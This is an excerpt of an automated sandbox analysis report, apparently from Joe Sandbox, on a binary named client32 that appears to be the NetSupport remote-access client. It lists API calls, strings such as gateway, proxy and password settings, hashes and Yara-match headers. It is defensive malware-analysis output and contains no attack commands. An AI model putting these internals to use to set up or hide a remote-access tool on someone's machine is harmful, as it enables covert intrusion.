                                                                                                • _memmove.LIBCMT ref: 69CF6EF4
                                                                                                • GetTickCount.KERNEL32(?,?,?,00001001,00000001), ref: 69CF6F4F
                                                                                                • InterlockedExchange.KERNEL32(02EF2F4A,-69D2A188,?,?,?,00001001,00000001), ref: 69CF6F60
                                                                                                Strings
                                                                                                • httprecv, xrefs: 69CF6BDD
                                                                                                • ReadMessage returned FALSE. Terminating connection, xrefs: 69CF6F3A
                                                                                                • ResumeTimeout, xrefs: 69CF6BBA
                                                                                                • FALSE, xrefs: 69CF6E67
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 69CF6E62
                                                                                                • ProcessMessage returned FALSE. Terminating connection, xrefs: 69CF6F25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                • API String ID: 1449423504-919941520
                                                                                                • Opcode ID: f922673b3debe78f11c738c8105b6805802481b3f32716e60311d972434c3b7f
                                                                                                • Instruction ID: c0843d0d57c77f2d7f313081144fd6c5245af22f3898ad1b1f05c302927c81c5
                                                                                                • Opcode Fuzzy Hash: f922673b3debe78f11c738c8105b6805802481b3f32716e60311d972434c3b7f
                                                                                                • Instruction Fuzzy Hash: 85B182B5D002989BEF60CF64DE44BD9B3B4BF49348F0080E5E649A7240E7B59AC5CF91
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32 ref: 11030F12
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11031037
                                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                                • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 1620732580-3468083601
                                                                                                • Opcode ID: 9863e0e3a0b7f722b0f310aa32cc767fca6cb2d11c64d482dc9f47db344ef0a9
                                                                                                • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                                • Opcode Fuzzy Hash: 9863e0e3a0b7f722b0f310aa32cc767fca6cb2d11c64d482dc9f47db344ef0a9
                                                                                                • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086A5C
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AEC
                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AFD
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B0E
                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B1F
                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks,?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B30
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                • API String ID: 2201880244-3035937465
                                                                                                • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                                • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 3535843008-1834795898
                                                                                                • Opcode ID: 86e3237ac1b9745dddb818f0af342d18f4e431cd4f62cb372250aaa284631697
                                                                                                • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                                                • Opcode Fuzzy Hash: 86e3237ac1b9745dddb818f0af342d18f4e431cd4f62cb372250aaa284631697
                                                                                                • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11074F43
                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                • API String ID: 703120326-1497550179
                                                                                                • Opcode ID: e4688f8407387d4bab8328f3f562448c3a4dbf4e24967312636c9c29056ca376
                                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                                • Opcode Fuzzy Hash: e4688f8407387d4bab8328f3f562448c3a4dbf4e24967312636c9c29056ca376
                                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                                APIs
                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,750A94D8), ref: 11145CA0
                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                • PostMessageA.USER32 ref: 11139C4F
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • SetWindowTextA.USER32(000103BC,00000000), ref: 11139CF7
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139DBC
                                                                                                • GetForegroundWindow.USER32 ref: 11139DDC
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139DEA
                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139E27
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139E78
                                                                                                • IsWindowVisible.USER32(000103BC), ref: 11139E85
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139E99
                                                                                                • EnableWindow.USER32(000103BC,00000000), ref: 11139DFF
                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(000103BC,00000000), ref: 11132144
                                                                                                • EnableWindow.USER32(000103BC,00000001), ref: 11139EAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                • API String ID: 3453649892-3803836183
                                                                                                • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                                                • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                                                • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostwsprintf
                                                                                                • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                                • API String ID: 875889313-3431570279
                                                                                                • Opcode ID: be877120142608fca6c2531b68b122bc3badda3df7e1b5234fba37ed4ecb06df
                                                                                                • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                                • Opcode Fuzzy Hash: be877120142608fca6c2531b68b122bc3badda3df7e1b5234fba37ed4ecb06df
                                                                                                • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                                APIs
                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 1428277488-3745656997
                                                                                                • Opcode ID: aa9df746ce16d88ad2490a6b5763401255b1af8d0dd1f8f50bdc232d2b7d8ee6
                                                                                                • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                                • Opcode Fuzzy Hash: aa9df746ce16d88ad2490a6b5763401255b1af8d0dd1f8f50bdc232d2b7d8ee6
                                                                                                • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                • _sprintf.LIBCMT ref: 11031401
                                                                                                • _setlocale.LIBCMT ref: 1103140B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 4242130455-3745656997
                                                                                                • Opcode ID: 5e116aca1680965cd23430a9e3aa85e056c6d5cd92fa3b80df57ee5c7257ff00
                                                                                                • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                                • Opcode Fuzzy Hash: 5e116aca1680965cd23430a9e3aa85e056c6d5cd92fa3b80df57ee5c7257ff00
                                                                                                • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                • API String ID: 512045693-419896573
                                                                                                • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                • API String ID: 2111968516-2157635994
                                                                                                • Opcode ID: 7a284482a7ccc8487282383b50822b5404020d19587f7608329e070a4855e9f6
                                                                                                • Instruction ID: ceb213f65c72d0df49a4933eb466fd1ef8b565e60f34fcb569e9a474b36c1ac1
                                                                                                • Opcode Fuzzy Hash: 7a284482a7ccc8487282383b50822b5404020d19587f7608329e070a4855e9f6
                                                                                                • Instruction Fuzzy Hash: 6E22A4B2A00258ABDF24CFA4DC80EEAB7B9BF49344F0485D9E54AA7540E6315F85CF52
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL), ref: 11086115
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory,986DAFD2,01F94958,01F94948,?,00000000,1118368C,000000FF,?,11032002,01F94958,00000000,?,?,?), ref: 1108613B
                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel,?,11032002,01F94958,00000000,?,?,?), ref: 1108614F
                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx,?,11032002,01F94958,00000000,?,?,?), ref: 11086163
                                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1108636A
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D68
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D7B
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D8E
                                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,756F1222,?,?,11086390,?,11032002,01F94958,00000000,?,?,?), ref: 11085DA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                • API String ID: 4263811268-2492245516
                                                                                                • Opcode ID: 573fb59633bb56a2c8299e3d27132188e04d1bf9316cd0f099af205f194590a4
                                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                • Opcode Fuzzy Hash: 573fb59633bb56a2c8299e3d27132188e04d1bf9316cd0f099af205f194590a4
                                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                APIs
                                                                                                • OpenMutexA.KERNEL32 ref: 11030CB3
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                • API String ID: 2061479752-1320826866
                                                                                                • Opcode ID: 6260680c8295fa7ccb2814a27d389372e2b98020e96dafc808ef6ff5bc8e6fee
                                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                • Opcode Fuzzy Hash: 6260680c8295fa7ccb2814a27d389372e2b98020e96dafc808ef6ff5bc8e6fee
                                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(986DAFD2,756F110C,00000000,00000000), ref: 11106E9E
                                                                                                • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                                                • GetTickCount.KERNEL32 ref: 11106EAD
                                                                                                • GetTickCount.KERNEL32(?,?), ref: 11106F00
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                                                • GetTickCount.KERNEL32(?,?), ref: 11106F3A
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                                                • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                • API String ID: 1574099134-3013461081
                                                                                                • Opcode ID: e94ee5592082916c516d858cd08a538ee78f5c592791c6320886d58cb83ba63d
                                                                                                • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                                                • Opcode Fuzzy Hash: e94ee5592082916c516d858cd08a538ee78f5c592791c6320886d58cb83ba63d
                                                                                                • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 110F618F
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110F61D1
                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,00000000), ref: 110F61F0
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F6203
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110F620C
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
                                                                                                • GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
                                                                                                • CloseHandle.KERNEL32(11189C68), ref: 110F626A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F6271
                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F627B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProcSession
                                                                                                • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                • API String ID: 2607481436-2825297712
                                                                                                • Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                                • Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
                                                                                                • Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                                • Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90
                                                                                                APIs
